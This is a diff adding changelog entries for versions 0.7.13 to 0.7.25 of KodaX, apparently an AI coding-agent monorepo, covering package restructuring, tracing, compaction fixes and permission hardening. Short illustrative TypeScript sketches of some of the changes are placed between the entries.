+ - `KodaXResult.artifactLedger?: readonly KodaXSessionArtifactLedgerEntry[]` — new optional field pre-populated by the FEATURE_076 reshape so downstream consumers do not have to walk the post-reshape `messages` for tool_result blocks.
774
+
775
+ ### Removed
776
+ - `truncatePlanForDisplay` helper and the head+tail truncation path: superseded by LLM-side length budget (FEATURE_075 prompt constraint) + InkREPL scroll + readline native scroll.
777
+
778
+ ### Documentation
779
+ - `docs/features/v0.7.25.md`: 075 scope narrowed (dropped editor + markdown, added LLM prompt structural constraint), 076 Q1-Q4 decisions captured, 058 section added with FEATURE_057 dependency-free rationale.
780
+ - `docs/features/v0.8.0.md`: FEATURE_058 moved out to v0.7.25 with migration note.
781
+ - `docs/FEATURE_LIST.md`: FEATURE_051 / FEATURE_058 / FEATURE_075 / FEATURE_076 marked Completed; v0.7.25 progress recorded; "Current released version" bumped to v0.7.25.
782
+
783
+ ### Test Status
784
+ - **coding**: 600/600 pass (+36 round-boundary, +4 token-accounting, +1 registry tests).
785
+ - **repl**: 830/830 pass (+11 scrollback-dump, +4 key-actions, +1 DialogSurface scroll; tool-confirmation truncation tests replaced with full-preservation test).
786
+ - **Full monorepo**: 2621 passing / 5 pre-existing baseline failures (`tests/kodax_cli`, `tests/kodax_core`, `tests/tracker-consistency` × 2 strikethrough-row drift, `packages/ai/.../base.test.ts` rate-limit timing flake) — identical to v0.7.24 baseline. **0 new regressions.**
787
+
788
+ ---
789
+
790
+ ## [0.7.24] - 2026-04-20
791
+
792
+ ### Added
793
+ - **FEATURE_082 — Package Restructure**: extract Layer A primitives and observability surfaces into 4 new workspace packages, leaving `@kodax/coding` as the coding-preset shell:
794
+ - `@kodax/core` (new): `Agent` / `Handoff` / `Runner` / `Guardrail` / `AgentReasoningProfile` / `Session` / `SessionEntry` / `MessageEntry` / `SessionExtension` / `CompactionPolicy` / `DefaultSummaryCompaction` / `Capability*` types relocated from `packages/coding/src/primitives/` (1478 LoC, 29 tests)
795
+ - `@kodax/tracing` (new): `Trace` / `Span` / `SpanData` discriminated union (8 variants — Agent / Generation / ToolCall / Handoff / Compaction / Guardrail / Evidence / Fanout) + `TracingProcessor` interface + `defaultTracer` (1112 LoC, 15 tests)
796
+ - `@kodax/session-lineage` (new): `LineageExtension` + `LineageCompaction` relocated from `packages/coding/src/extensions/lineage.ts` (514 LoC, 13 tests)
797
+ - `@kodax/mcp` (new): full MCP capability provider relocated from `packages/coding/src/capabilities/providers/mcp/*` — preserves all 5 progressive-disclosure modes (lazy connect / two-tier descriptors / search-describe / elicitation / cache); `@kodax/coding` retains a thin adapter (`capabilities/providers/mcp-adapter.ts`) bridging the new package to its `CapabilityProvider` registry (3125 LoC, 28 tests)
798
+ - `@kodax/capabilities` **dropped** (FM-2): the planned shell would have shipped empty; per the CLAUDE.md "abstract only after 3+ real cases" rule, it will be recreated when `FEATURE_084` (v0.7.26) lands Scout/Planner/Generator/Evaluator. Final package count: 9 (planned 10).
799
+ - cli-events cleanup **deferred** to `FEATURE_086` (v0.7.27): isolated relocation would create `ai`→`coding` circular dep; clean fix needs full Provider+registry rewrite, out of 082 scope. v0.7.27 design doc updated with item #9 capturing this work.
800
+ - **FEATURE_083 — Unified Tracer / Span / TracingProcessor**: introduce a single observability model across all primitives:
801
+ - `TracingProcessor` lifecycle: `onSpanStart` / `onSpanEnd` / `onTraceEnd` / `shutdown`
802
+ - `ConsoleTracingProcessor` (OTLP-ish stdout) + `FileTracingProcessor` (`.kodax/.traces/{traceId}.jsonl`, serialised `writeChain` so `shutdown()` awaits all in-flight flushes — fixes race vs fire-and-forget)
803
+ - `Runner` accepts `tracer` in `RunOptions`; `PresetDispatcher` gains 4th arg `PresetTracingContext`; SA path emits `AgentSpan` + `GenerationSpan` around `runKodaX` as **dual emission** (old trace events kept `@deprecated` for v0.7.27 removal) — zero behavior change for existing consumers
804
+ - `examples/otel-export.ts`: `PseudoOtelProcessor` showing how external consumers wire OpenTelemetry / Langfuse on top of the new model
805
+ - **FEATURE_093 (partial) — Coding + REPL Internal Circular Dependency Cleanup**: opportunistic cleanup while the restructure already touched all import paths. Reduced madge cycles from ~50 to 1 (98% elimination, 0 inter-package, 1 intra-package remaining):
806
+ - `coding`: `extensions/runtime-contract.ts` narrow 6-method interface replaces full `KodaXExtensionRuntime` reference in `types.ts` hub (~40 cycles broken); `agent.ts` does a single `as KodaXExtensionRuntime` cast at the entry point; `child-executor.ts` uses computed-spec dynamic import to break `tools→agent` edge; `agent.ts` removes vestigial `KodaXClient` re-export in favor of the barrel
807
+ - `repl`: split `tui/components`, `ui/shortcuts`, `completers`, and `project-harness` imports to reach concrete files (`renderer-runtime.ts`, `useShortcut.ts`, `completers/types.ts`, `project-harness-types.ts`) instead of barrel re-exports; test mocks updated to match
808
+ - Remaining: 1 intra-package cycle in `repl/commands` (builtin↔interactive↔index triangle, blocked by ~1900-line `BUILTIN_COMMANDS` array) — kept for the dedicated `FEATURE_093` pass at v0.8.0
809
+
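The FEATURE_083 entry above mentions a serialised `writeChain` so that `shutdown()` awaits in-flight flushes. The pattern can be sketched with a single promise chain. `ChainedWriter` and `Sink` are hypothetical names, and the sink is injected so the example makes no filesystem calls; the real `FileTracingProcessor` may differ.

```typescript
// Destination for one serialized line; injected so the sketch is I/O-free.
type Sink = (line: string) => Promise<void>;

class ChainedWriter {
  private chain: Promise<void> = Promise.resolve();
  private readonly sink: Sink;

  constructor(sink: Sink) {
    this.sink = sink;
  }

  // Queues the write behind all earlier writes. A failed write is swallowed
  // here so that it does not reject the chain and block later writes.
  write(line: string): void {
    this.chain = this.chain.then(() => this.sink(line)).catch(() => undefined);
  }

  // Resolves only after every write queued so far has settled.
  shutdown(): Promise<void> {
    return this.chain;
  }
}
```

With fire-and-forget writes, a slow early write could land after a fast later one, and a shutdown could return before either finished; chaining avoids both.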
810
+ ### Changed
811
+ - `@kodax/coding/src/extensions/types.ts`: `CapabilityKind` / `CapabilityProvider` / `CapabilityResult` re-exported from `@kodax/core` (lifted to Layer A so third-party RAG / custom-index providers can implement against a stable contract)
812
+ - `Runner` `RunOptions.tracer` field added (optional; if omitted, the 3-arg dispatcher fast path remains unchanged)
813
+
814
+ ### Documentation
815
+ - `docs/features/v0.7.24.md`: Implementation Notes section with slice breakdown (LoC + file count per slice), design deviations (FM-2 capabilities drop, P3 cli-events deferral, Capability type extraction), FEATURE_093 opportunistic completion, test summary, final dependency graph
816
+ - `docs/features/v0.7.27.md` (FEATURE_086): added item #9 capturing the deferred cli-events relocation work
817
+ - `docs/features/v0.8.0.md`: added FEATURE_093 section documenting the remaining 1-cycle scope (`repl/commands` triangle blocker)
818
+ - `docs/FEATURE_LIST.md`: FEATURE_082 and FEATURE_083 marked Completed; FEATURE_093 added to Planned; v0.7.24 progress recorded; "Current released version" bumped to v0.7.24
819
+
820
+ ### Test Status
821
+ - Full monorepo suite: **2561 pass / 5 baseline failures** — all 5 pre-existing since v0.7.23 (`tests/kodax_cli`, `tests/kodax_core`, `tests/tracker-consistency` × 2 strikethrough-row drift, `packages/ai/.../base.test.ts` rate-limit timing flake); confirmed unaffected by this release.
822
+ - **0 new regressions** across 4 new packages (`@kodax/core`, `@kodax/tracing`, `@kodax/session-lineage`, `@kodax/mcp`) and adapter (`mcp-adapter`).
823
+
824
+ ### Final Dependency Graph (pure DAG, madge-verified)
825
+ ```
826
+ ai (leaf) tracing (leaf) skills (leaf)
827
+ agent → ai
828
+ core → ai, tracing
829
+ session-lineage → ai, core
830
+ mcp → ai, core
831
+ coding → agent, ai, core, mcp, session-lineage, skills
832
+ repl → coding, skills
833
+ ```
834
+
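The dependency graph above is described as a pure DAG. As an illustration of what that claim means, the sketch below encodes the listed edges and checks them with a depth-first topological sort. This is not how madge works internally; `topoOrder` is a hypothetical helper.

```typescript
// Edges copied from the graph above: package -> packages it depends on.
const deps: Record<string, string[]> = {
  ai: [],
  tracing: [],
  skills: [],
  agent: ["ai"],
  core: ["ai", "tracing"],
  "session-lineage": ["ai", "core"],
  mcp: ["ai", "core"],
  coding: ["agent", "ai", "core", "mcp", "session-lineage", "skills"],
  repl: ["coding", "skills"],
};

// Depth-first topological sort; throws when it meets a node that is still
// being visited, which means the graph contains a cycle.
function topoOrder(graph: Record<string, string[]>): string[] {
  const state = new Map<string, "visiting" | "done">();
  const order: string[] = [];
  const visit = (node: string, path: string[]): void => {
    const s = state.get(node);
    if (s === "done") return;
    if (s === "visiting") throw new Error(`cycle: ${[...path, node].join(" -> ")}`);
    state.set(node, "visiting");
    for (const dep of graph[node] ?? []) visit(dep, [...path, node]);
    state.set(node, "done");
    order.push(node); // dependencies are pushed before their dependents
  };
  for (const node of Object.keys(graph)) visit(node, []);
  return order;
}
```

The returned order is also a valid build order, since every package appears after the packages it depends on.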
835
+ ---
836
+
837
+ ## [0.7.23] - 2026-04-20
838
+
839
+ ### Added
840
+ - **FEATURE_080 + FEATURE_081 — Layer A Primitives + Session/Compaction Split**: introduce the KodaX Agent-as-data surface (`@experimental`) under `@kodax/coding`:
841
+ - `Agent` / `Handoff` / `Guardrail` / `AgentReasoningProfile` declarative types + `createAgent` / `createHandoff` factories (`packages/coding/src/primitives/agent.ts`)
842
+ - `Session` / `SessionEntry` / `MessageEntry` / `SessionExtension` base types + `createInMemorySession` (`packages/coding/src/primitives/session.ts`)
843
+ - `CompactionPolicy` interface + `DefaultSummaryCompaction` (token-threshold + LLM-summary, standalone, zero KodaX-runtime dependency) (`packages/coding/src/primitives/compaction.ts`)
844
+ - `Runner` class with generic LLM-callback path and preset dispatcher registry (`packages/coding/src/primitives/runner.ts`)
845
+ - `createDefaultCodingAgent()` + Option-Y preset dispatcher: `Runner.run(defaultCodingAgent, prompt, { presetOptions })` routes to `runKodaX(presetOptions, prompt)` — API surface goes through `Runner`, body stays on the existing SA path unchanged until FEATURE_084 rewrites it (`packages/coding/src/primitives/coding-preset.ts`)
846
+ - Scout / Planner / Generator / Evaluator declared as `Agent` placeholders ready for the FEATURE_084 runtime rewrite (`packages/coding/src/primitives/task-engine-agents.ts`)
847
+ - `LineageExtension` SessionExtension with `label` / `attachArtifact` operators and `buildLineageTree` reducer (`packages/coding/src/extensions/lineage.ts`)
848
+ - SDK-consumer example (`examples/embedded-agent.ts`)
849
+ - 40 new unit tests across compaction / lineage / runner / coding-preset / role agents; all passing.
850
+
851
+ ### Changed
852
+ - `compactMessages()` in `@kodax/agent` marked `@deprecated`; superseded by the `CompactionPolicy` interface + `DefaultSummaryCompaction`. Scheduled for removal in FEATURE_086 (v0.7.27).
853
+
854
+ ### Documentation
855
+ - `docs/FEATURE_LIST.md`: FEATURE_080 and FEATURE_081 marked Completed; v0.7.23 progress recorded.
856
+ - `docs/features/v0.7.23.md`: Implementation Notes section with slice breakdown, Option-Y rationale, placement deviation (LineageExtension lives in `@kodax/coding` until the v0.7.24 package restructure), code-review resolutions, and acceptance-criteria checklist.
857
+
858
+ ### Zero-Behavior Change Guarantee
859
+ - `runKodaX` / `runManagedTask` / `KodaXClient` bodies untouched.
860
+ - `packages/coding/src/task-engine.test.ts` 50/50 pass (behavior snapshot unchanged).
861
+ - Full monorepo suite: 2484 pass / 4 fail — all 4 pre-existing baseline failures (`tests/kodax_cli`, `tests/kodax_core`, `tests/tracker-consistency` count drift on strikethrough rows, `packages/ai/.../base.test.ts` rate-limit timing flake); confirmed unaffected by this release via `git stash` baseline comparison.
862
+
863
+ ---
864
+
865
+ ## [0.7.22] - 2026-04-19
866
+
867
+ ### Added
868
+ - **FEATURE_079 — Task Engine Phase 1 Pure Extraction**: Split task-engine.ts (9034 → ~7271 lines) into 14 internal modules under `task-engine/_internal/` — constants, text-utils, formatting, protocol (parse-helpers + sanitize), managed-task (budget, checkpoint, workspace), and prompts (role-prompt, role-agent, role-prompt-types, tool-policy, runtime-execution-guide). Zero behavior changes; all extracted functions are pure moves with deferred items documented in code comments.
869
+
870
+ ### Fixed
871
+ - **Pre-existing test regressions (5 tests)**: `resilience.test.ts` — align `streamIdleTimeoutMs` assertion with intentional default change (60000 → 0); `agent.extension-runtime.test.ts` — add `reasoningMode:'off'` to 2 tests to prevent auto-follow-up interference; `agent.provider-policy.test.ts` — add `repoIntelligenceMode:'off'` to skip expensive repo-intelligence build in policy-block tests. Full suite now 584/584 green.
872
+
873
+ ### Documentation
874
+ - Update `docs/FEATURE_LIST.md` and `docs/features/v0.7.22.md` with FEATURE_079 progress
875
+
876
+ ---
877
+
878
+ ## [0.7.21] - 2026-04-19
879
+ ### Fixed
880
+ - **FEATURE_077 — Session-Scoped Prompt Input History**: REPL prompt input history now survives the `Ctrl+O` transcript-mode toggle. Previously a single `Ctrl+O` caused `<PromptComposer>` to unmount and silently wiped the Up-arrow history; the entries array has been lifted above the composer lifecycle so history persists for the whole REPL session. Navigation cursor and draft placeholder still reset on remount to preserve pre-existing behavior.
881
+
882
+ ### Documentation
883
+ - Remove `docs/features/v1.0.0.md` (all features migrated to earlier versions)
884
+ - Add feature docs for v0.7.22, v0.7.23, v0.7.24, v0.7.26–v0.7.29, v0.7.31, v0.7.32
885
+ - Update `KNOWN_ISSUES.md`, `v0.8.0.md`, and `features/README.md` references
886
+
887
+ ---
888
+
889
+ ## [0.7.20] - 2026-04-18
890
+ ### Added
891
+ - **FEATURE_072 — Lineage-Native Compaction Migration**: post-compact attachments stored as a first-class `KodaXSessionCompactionEntry.postCompactAttachments` field instead of inline `[Post-compact: ...]` system messages; `getSessionMessagesFromLineage` slicer inlines attachments at the derivation layer, preserving `getContextMessagesForEntry`'s 1-to-1 contract (FEATURE_073 prerequisite); `evictOldIslandMessageContent` strips attachments on old-island compaction entries (prevents N-round × ~50k token accumulation); `cloneForkableEntry` deep-clones attachments on `/fork`; `applySessionCompaction` signature gains a typed `postCompactAttachments` parameter with defensive strip of inline messages; `CompactionUpdate.postCompactAttachments` routes attachments from agent.ts to REPL natively; `onIterationEnd.info.scope: 'parent' | 'worker'` field prevents worker token counts from overwriting the parent REPL's context snapshot; Scout `initialMessages` derived from lineage across three REPL call-sites (`repl.ts`, `InkREPL.tsx`, `project-commands.ts`); `applyLineageTruncation` pure helper reserved for graceful-degradation writeback
892
+ - **FEATURE_074 — Subagent Permission Boundary Hardening**: plan-mode propagation to child agents via live predicate closure over parent state (mid-run `plan ↔ accept-edits` toggles reach in-flight children immediately); independent `exit_plan_mode` tool with tri-state callback (`boolean | 'not-in-plan-mode'`) so misuse outside plan mode surfaces as an explicit tool error; `set_permission_mode` callback no longer forwarded into `KodaXToolExecutionContext` (fails closed on child invocations); system-temp paths exempted from `isAlwaysConfirmPath` so `accept-edits` and `auto-in-project` no longer force confirmation for writes to `$TMP` / `os.tmpdir()`
893
+
894
+ ### Fixed
895
+ - **Issue 119 — Scout-scope-driven mutation intent**: replace pre-Scout `mutationSurface` heuristic with `inferScoutMutationIntent()` that derives mutation guard from Scout's actual scope output (`review-only` / `docs-scoped` / `open`); prevents stale pre-Scout heuristic from blocking legitimate code edits when Scout upgrades a docs-flagged task to H1
896
+ - **Post-compact context monotonic growth (v0.7.18 regression)**: six surgical fixes — graceful degradation gate rekeyed from reference equality to token-count comparison (P1), circuit breaker tripping after partial-success attempts (P2), `generateSummary` throws on empty LLM text (P3), `injectPostCompactAttachments` strips prior `[Post-compact: ...]` messages before injection (P4), absolute caps `POST_COMPACT_TOKEN_BUDGET = 50_000` and `POST_COMPACT_MAX_TOKENS_PER_FILE = 5_000` (P5), REPL finally-block rebuilds `context.contextTokenSnapshot` from local messages to clear worker-leaked snapshots (P6)
897
+ - **Memory pressure**: eliminate React dev-mode leak, lineage clone bloat (`cloneMessage` returns identity), and streaming churn
898
+ - **Task engine routing**: trust Scout routing authority, fix ceiling clamp context-loss bug; evaluator prompt uses effective ceiling, not stale heuristic
899
+ - **Global kodax bin**: route through CJS preload shim for Node resolution on Windows
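As a rough illustration of the absolute caps in fix P5, the sketch below clamps each file to the per-file limit and stops admitting files once the total budget is spent. The two constants are quoted from the entry above; the `AttachmentCandidate` shape and the `selectPostCompactAttachments` helper are hypothetical and not taken from the package.

```typescript
// Caps quoted from the changelog entry.
const POST_COMPACT_TOKEN_BUDGET = 50_000;
const POST_COMPACT_MAX_TOKENS_PER_FILE = 5_000;

// Hypothetical shape; the real attachment type is not shown in the changelog.
interface AttachmentCandidate {
  path: string;
  tokens: number;
}

// Clamp each candidate to the per-file cap, then admit candidates in order
// until the total budget is exhausted. The last admitted file may be trimmed.
function selectPostCompactAttachments(
  candidates: AttachmentCandidate[],
): AttachmentCandidate[] {
  const selected: AttachmentCandidate[] = [];
  let remaining = POST_COMPACT_TOKEN_BUDGET;
  for (const candidate of candidates) {
    if (remaining <= 0) break;
    const tokens = Math.min(
      candidate.tokens,
      POST_COMPACT_MAX_TOKENS_PER_FILE,
      remaining,
    );
    if (tokens <= 0) continue;
    selected.push({ path: candidate.path, tokens });
    remaining -= tokens;
  }
  return selected;
}
```

With both caps in place the injected payload is bounded regardless of how many files were modified or how many compaction rounds have run.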
900
+
901
+ ### Changed
902
+ - **Scratch scripts**: directed to `.agent/tmp/` instead of `.agent/` root for a cleaner workspace layout
903
+
904
+ ### Documentation
905
+ - **FEATURE_072 acceptance close-out**: verified and checked off all 12 completed acceptance criteria with file:line code evidence; 3 items explicitly deferred (6-consumer migration, bounded-growth integration test, snapshot coherence) with status notes; P4/P6 retirement plan updated — now retained indefinitely after FEATURE_073 cancellation
906
+ - **FEATURE_074 acceptance verification**: all 8 acceptance criteria verified against code (`set_permission_mode` removal, child exclusion, live plan-mode predicate, `exit_plan_mode` tool, long-plan fallback, system-temp exemption)
907
+ - **FEATURE_073 cancelled after philosophy review**: no user pain point, no performance improvement, main selling point (`/fork` improvement) self-retracted; design doc retained as future reference
908
+ - **FEATURE_072 manual test guide**: `docs/test-guides/FEATURE_072_v0.7.20_TEST_GUIDE.md` covering `/fork` + `/rewind` across compaction boundary, long-AMA bounded growth, worker scope non-propagation
909
+ - **Roadmap hygiene**: FEATURE_026 (Roadmap Integrity) removed as unnecessary; FEATURE_077 (Session-Scoped Prompt Input History) staged for v0.7.21; FEATURE_073 / 075 / 076 designs staged into v0.7.25
910
+
911
+ ---
912
+
913
+ ## [0.7.19] - 2026-04-16
914
+ ### Added
915
+ - **AMA Scout simplification**: Optional managed protocol and scope reflection for Scout role
916
+ - **Session lineage enhancements**: Extended session lineage types and tree visualization support
917
+ - **Storage improvements**: Expanded interactive storage test coverage and session tree integration
918
+
919
+ ### Fixed
920
+ - **H0 completion signal**: Preserve explicit H0 completion signal and ensure failed H0 has task state
921
+ - **REPL session handling**: InkREPL session state and storage edge case fixes
922
+
923
+ ---
924
+
925
+ ## [0.7.18] - 2026-04-16
926
+ ### Added
927
+ - **FEATURE_064 — Multi-Provider Cost Observatory**: Session cost tracking with `recordUsage()` after each LLM call; `/cost` command shows per-provider and per-role cost breakdown; built-in rate table for 11 providers
928
+ - **FEATURE_065 — MCP OAuth wiring**: OAuth 2.0 + PKCE token acquisition wired into MCP runtime `doConnect()`; cached token reuse and refresh; Authorization header injection for authenticated MCP servers
929
+ - **FEATURE_066 — Permission Hardening**: Bash command risk classifier (safe/normal/dangerous) wired into InkREPL `beforeToolExecute`; dangerous commands always require confirmation; session-scoped denial tracker prevents repeated prompts
930
+ - **FEATURE_067 — Child Agent Execution**: `dispatch-child-tasks` tool with read-only and write fan-out; child-executor with structured briefing, semaphore-based parallelism, abort propagation, and evaluator-assisted merge
931
+ - **FEATURE_068 — Worktree Isolation Tool**: `worktree_create` / `worktree_remove` tools with path traversal guard and safety checks
932
+ - **FEATURE_069 — Session Rewind & Shell Completion**: `/rewind [entry-id|label]` command for in-place session truncation; `kodax completion bash/zsh/fish` CLI subcommand
933
+ - **FEATURE_070 — Context Engine V2**: Microcompaction integration in agent loop; bash-intent extraction for smarter placeholders; user message protection in compression; analysis scratchpad in summary generator; post-compact artifact ledger injection + file content re-injection (top-N modified files); circuit breaker + graceful degradation for compaction failures
934
+ - **FEATURE_071 — AMA Managed Task Resilience**: Worker checkpoint persistence after each AMA phase; `findValidCheckpoint()` with 1h TTL + git commit validation; `resumeManagedTask()` for mid-execution recovery
935
+ - **Extension API helpers**: `api.exec()` for sandboxed shell command execution (env whitelist, timeout); `api.webhook()` for HTTP webhook with timeout support
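The checkpoint lookup in FEATURE_071 (1h TTL plus git commit validation) might look roughly like the sketch below. The `WorkerCheckpoint` fields, the function name, and the interpretation of "git commit validation" as an equality check against the current commit are all assumptions; the changelog only names `findValidCheckpoint()` and the TTL.

```typescript
// 1h TTL as stated in the changelog entry.
const CHECKPOINT_TTL_MS = 60 * 60 * 1000;

// Hypothetical checkpoint shape for illustration only.
interface WorkerCheckpoint {
  phase: string;
  createdAt: number; // epoch milliseconds
  gitCommit: string;
}

// Return the newest checkpoint that is still within the TTL and was taken on
// the same commit the workspace is currently at, or undefined if none qualify.
function findValidCheckpointSketch(
  checkpoints: WorkerCheckpoint[],
  currentCommit: string,
  now: number = Date.now(),
): WorkerCheckpoint | undefined {
  let best: WorkerCheckpoint | undefined;
  for (const checkpoint of checkpoints) {
    const fresh = now - checkpoint.createdAt <= CHECKPOINT_TTL_MS;
    const sameCommit = checkpoint.gitCommit === currentCommit;
    if (!fresh || !sameCommit) continue;
    if (best === undefined || checkpoint.createdAt > best.createdAt) {
      best = checkpoint;
    }
  }
  return best;
}
```

Passing `now` as a parameter keeps the function deterministic in tests.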
936
+
937
+ ### Changed
938
+ - **FEATURE_063 — Hook system cancelled**: Standalone hook system (`packages/coding/src/hooks/`) removed (~600 lines); executor capabilities extracted to Extension API helpers (`api.exec()` / `api.webhook()`); Extension system is the single extensibility mechanism
939
+ - **FEATURE_064 — Status bar cost display descoped**: Cost information available only via `/cost` command, not in status bar
940
+
941
+ ### Fixed
942
+ - **Provider resilience**: Backoff improvements, Retry-After header support, ECONNRESET handling, context overflow recovery
943
+ - **Ask-user**: Scroll window, index mapping, multi-question support; ESC cancellation propagation (issue #114)
944
+ - **Tool group refs**: Preserved on ledger kind switch (issue #115)
945
+ - **AMA H0**: Fix truthiness bug in the continuation path and resolve a validation conflict
946
+ - **Thinking blocks**: Preserved for Kimi compatibility
947
+ - **Stream resilience**: Stale-round guard (issue #116)
948
+ - **Security**: Worktree path traversal guard; hooks/OAuth/Docker hardening; denial-tracker TTL
949
+
950
+ ---
951
+
952
+ ## [0.7.17] - 2026-04-12
953
+ ### Added
954
+ - **MCP fallback whitelist**: Fallback whitelist, dispose/resetTransport split, documentation for #108-#111
955
+ - **Session history seed conversion**: Tool summary display improvements and v0.7.35 feature docs
956
+ - **Lightweight i18n framework**: Internationalization framework for UI strings with English and Chinese support (en/zh)
957
+ - **End-turn fallback auto-continuation**: Managed protocol end_turn fallback auto-continuation and v0.7.35 Engineering Shell Maturity planning
958
+
959
+ ### Fixed
960
+ - Classify 'aborted' errors as retryable `connection_failure`, simplify transient error hint
961
+
962
+ ---
963
+
964
+ ## [0.7.16] - 2026-04-11
965
+
966
+ ### Added
967
+ - **FEATURE_061 Phase 2 — Scout direct completion**: Scout now completes H0 tasks end-to-end as both judge and executor, eliminating the scout-then-hand-off round-trip
968
+ - **FEATURE_061 Phase 3 — Context continuation across role upgrades**: Scout→Generator (H1) and Scout→Planner (H2) preserve session context, eliminating cold-start context breaks
969
+ - **FEATURE_061 Phase 4 — Role-level subagent capability**: Every core role (Scout/Planner/Generator/Evaluator) can spawn subagents for parallel work via `runOrchestration`
970
+ - **FEATURE_062 — Managed task budget simplification**: Immutable budget model with 2 fields + 4 functions replaces 10 fields + 14 functions; convergence signal inline in `buildWorkerRunOptions`
971
+ - **MCP transport module**: New `transport.ts` for improved MCP provider capability
972
+
973
+ ### Changed
974
+ - **FEATURE_061 Phase 1 — Pre-Scout routing layers removed**: No more LLM routing call, harness guardrails, or Scout bypass before Scout entry; Intent Gate goes straight to Scout
975
+ - **Reasoning pipeline trimmed**: `createReasoningPlan` uses heuristic-only routing; `routeTaskWithLLM` dead-coded (FEATURE_061 Phase 1)
976
+ - **Harness guardrail system simplified**: `applyManagedHarnessGuardrailsToPlan` passes review context without forcing harness floors (FEATURE_061 Phase 1)
977
+ - **Task engine simplified**: ~3200 net lines removed from `task-engine.ts` — tactical flows, budget zones, and pre-Scout bypass paths consolidated
978
+ - **REPL commands updated**: Command types and interactive commands adapted for simplified AMA flow
979
+ - **Status bar and UI surfaces updated**: Status bar, shortcuts, surface status adapted for Scout-first architecture
980
+ - **Clipboard utility hardened**: Improved clipboard handling with expanded test coverage
981
+ - **Provider resilience expanded**: Error classification and resilience tests updated for broader transient pattern coverage
982
+ - **ACP server updated**: ACP server and CLI option helpers updated for Scout-first routing
983
+
984
+ ### Removed
985
+ - `shouldBypassScoutForManagedH0` and Scout bypass path — all AMA tasks now go through Scout (FEATURE_061 Phase 1)
986
+ - `resolveManagedHarnessGuardrail` and pre-Scout harness floor enforcement (FEATURE_061 Phase 1)
987
+ - 3 Tactical Flow variants (`runTacticalReviewFlow`, `runTacticalInvestigationFlow`, `runTacticalLookupFlow`) — replaced by role-level subagent capability (FEATURE_061 Phase 4)
988
+ - Budget zone functions (`resolveBudgetZone`, `resolveWorkerIterLimits`, `formatBudgetAdvisory`, reserve logic) — replaced by simple cap/used model (FEATURE_062)
989
+ - ~3200 net lines removed across task-engine, reasoning, and related modules
990
+
991
+ ---
992
+
993
+ ## [0.7.15] - 2026-04-10
994
+
995
+ ### Added
996
+ - **Fullscreen transcript surface rewrite**: Local renderer replaces Ink substrate for fullscreen REPL — vendored renderer, localized terminal hooks, renderer-native transcript interaction, and explicit transcript mode replacing implicit review mode
997
+ - **REPL cockpit substrate**: New prompt input controller with deep keyboard routing, footer surfaces for help/notices/queued state, transcript-native tool explanations, and owned TUI compatibility layer
998
+ - **Feature 045 provider-resilience**: Stream resilience across all provider layers with expanded transient error detection, Scout H0 tool policy fix, and prompt waiting/busy terminal state clarification
999
+ - **AMA tactical fan-out**: Investigation fan-out slice, lookup triage, and generalized reduction for AMA tactical planning; centralized branch lifecycle in scheduler; child-fanout restricted to runtime-backed review validation
1000
+ - **Harness calibration and persistence**: Harness calibration corpus and checkpoint profiling, pivot persistence substrate, and workspace runtime truth (Feature 053)
1001
+ - **Durable memory anchors**: First-class retrieval substrate with durable memory anchors, sectionized prompt assembly with prompt snapshot contracts
1002
+ - **Multimodal artifact input substrate**: Align multimodal prompt artifact transport for rich content flows
1003
+ - **Official sandbox extension substrate**: New sandbox extension package foundation
1004
+ - **Incremental repo intelligence refresh**: Incremental update support for repo intelligence artifacts
1005
+ - **Feature 055 REPL hardening**: REPL substrate hardening with bracketed paste protocol (replacing timing-based detection), busy prompt shell virtualization, and graceful exit flow serialization
1006
+ - **Renderer viewport truth alignment**: Transcript scroll now uses renderer-accurate viewport geometry
1007
+
1008
+ ### Changed
1009
+ - **Fullscreen REPL localized from Ink**: Renderer internals, core engine shell, root primitives, input parsing, and terminal runtime hooks all localized; Ink substrate fully isolated
1010
+ - **Transcript surface refactored**: Transcript body/footer separated, search moved into transcript footer, windowing moved into scrollbox, surface lifecycle finalized
1011
+ - **Prompt shell split from transcript shell**: Separate prompt shell policy with hardened exit flow and interactive exit lifecycle cleanup
1012
+ - **Repointel skill reorganized**: Follows Claude Code Skills spec; host integration refactored
1013
+ - **Legacy project shell retired**: Removed from REPL surface
1014
+ - **Prompt sectionization**: Prompt assembly sectionized with snapshot contracts for reproducibility
1015
+
1016
+ ### Fixed
1017
+ - Fullscreen banner moved into transcript history for correct ordering
1018
+ - MCP typing and transcript chrome behavior stabilized
1019
+ - Transcript selection rooted in rendered geometry
1020
+ - Prompt streaming feedback simplified
1021
+ - Native transcript browser controls, footer separators, and mouse selection restored
1022
+ - Native clipboard preferred on local terminals
1023
+ - Transcript viewport budget aligned; spinner liveness restored
1024
+ - Transcript compact output truncation fixed
1025
+ - REPL status colors and banner logo restored after regression
1026
+ - Message list hook order regressions fixed
1027
+ - Prompt editing shortcuts exposed in help and registry
1028
+ - Transcript search anchoring and keyboard routing tightened
1029
+ - Docs-only technical docs kept out of H2 reasoning path
1030
+ - Pruning gap ratio added to prevent repeated shallow compaction
1031
+ - Wheel history and banner unsticking on risky hosts
1032
+
1033
+ ---
1034
+
1035
+ ## [0.7.14] - 2026-04-02
1036
+
1037
+ ### Added
1038
+ - **Repo-intelligence dirty snapshot strategy and inventory tracking**: Dirty snapshot support for memoized reuse across requests, baseline/inventory files for clean git baseline tracking, file analysis index and dirty source hint caching
1039
+
1040
+ ### Changed
1041
+ - Bump repo-intelligence schema versions (index: 1→3, query: 2→9)
1042
+ - Sort dependencies alphabetically in package.json
1043
+
1044
+ ---
1045
+
1046
+ ## [0.7.13] - 2026-03-31
1047
+
1048
+ ### Added
1049
+ - **FEATURE_045: Provider Stream Resilience and Graceful Recovery**: Comprehensive stream resilience improvements across all provider layers — expanded transient error detection with 21 message patterns, retry delay interruptible via AbortSignal, enhanced streaming robustness for Anthropic/OpenAI/custom providers
1050
+ - **User-Agent compatibility mode**: New `userAgentMode` config field (`compat`/`sdk`) on custom and built-in providers to control User-Agent header for gateway compatibility
1051
+ - **Shell environment hydration**: Resolve API keys and PATH from login shell profiles (bash/zsh/fish) when not available in the current process environment; null-delimited parsing with sentinel-based extraction
1052
+ - **Multi-tool call tracking**: Refactored single `activeToolCall` into array-based `activeToolCalls` for concurrent tool call tracking in the UI layer
1053
+ - **Tool confirmation module**: Extracted `buildToolConfirmationPrompt` into dedicated `tool-confirmation.ts` with network/delete command detection
1054
+ - **Managed task live status label**: New `formatManagedTaskLiveStatusLabel` for phase-aware status rendering with worker prefix trimming
1055
+ - **`onToolInputDelta` metadata**: Stream callback now receives optional `toolId` for multi-tool correlation
1056
